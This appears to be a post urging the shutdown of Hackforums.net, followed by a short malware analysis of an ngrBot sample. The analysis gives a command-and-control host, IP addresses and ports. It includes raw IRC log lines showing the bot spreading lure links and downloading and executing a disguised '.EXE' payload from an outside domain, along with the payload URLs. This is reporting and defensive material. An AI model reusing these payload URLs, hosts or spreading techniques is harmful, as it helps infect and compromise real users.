Hackforums.net Investigation


We are working to get Hackforums.net shut down. We feel strongly that it a website which has an undue influence on young people as well as promoting illegal computer activities such as hacking, virus spreading, manipulation of online financial services etc.

I'm not certain of what your criteria if for judging a site to be 'positive for malware'. I know that is not an easy threat to withstand and I don't blame this site for exercising caution and withdrawing the 'positive' for malware decision.

Hackforums.net - "Infecting one another with malware."


We are reporting this site for illegal activitie and it should be closed as soon as posible!

Legal internet law will clean all illegal activities and we will help realise it!

[IT Security Team]

jskd6c.jumpingcrab.com(ngrBot hosted in Panama Eric Szopa)

Looks like ngrBot the reptile mod made by fubar and jam3s is spreading alot

Resolved : [jskd6c.jumpingcrab.com] To [184.107.143.126]

Remote Host Port Number
184.107.143.126 2009 and 6667 PASS ngrBot
213.251.170.52 80
70.85.227.66 80

PRIVMSG #root :[HTTP]: Updated HTTP spread message to "juas juaz mira esto bajalo :D http://bit.ly/kgPE5S"
PRIVMSG #root :[d="http://www.befordsouthpointford.com/bfam/Ford.Mustang.Cobra.2011.JPEG.EXE" s="143360 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.tmp" - Download retries: 0
PONG :irc.sudominio.org
NICK n{US|XPa}rzvzsak
USER rzvzsak 0 0 :rzvzsak
JOIN #root 301189
PRIVMSG #root :[MSN]: Updated MSN spread interval to "1"
PRIVMSG #root :[MSN]: Updated MSN spread message to "jijiji mira :D bajalo :D http://bit.ly/kgPE5S"
PRIVMSG #root :[HTTP]: Updated HTTP spread interval to "1"


* The data identified by the following URLs was then requested from the remote web server:
o http://api.wipmania.com/
o http://www.befordsouthpointford.com/bfam/Ford.Mustang.Cobra.2011.JPEG.EXE
o http://www.befordsouthpointford.com/bfam/llllllllll.EXE

Crypter used to protect the bot:
C:\Users\M4x\Documents\Programmieren\PECRYPT\Client\EXECUTABLE\Loader_Stub\Release\Loader_Stub.pdb

Detection:
2/41 in virustotal


hosting infos:
http://whois.domaintools.com/184.107.143.126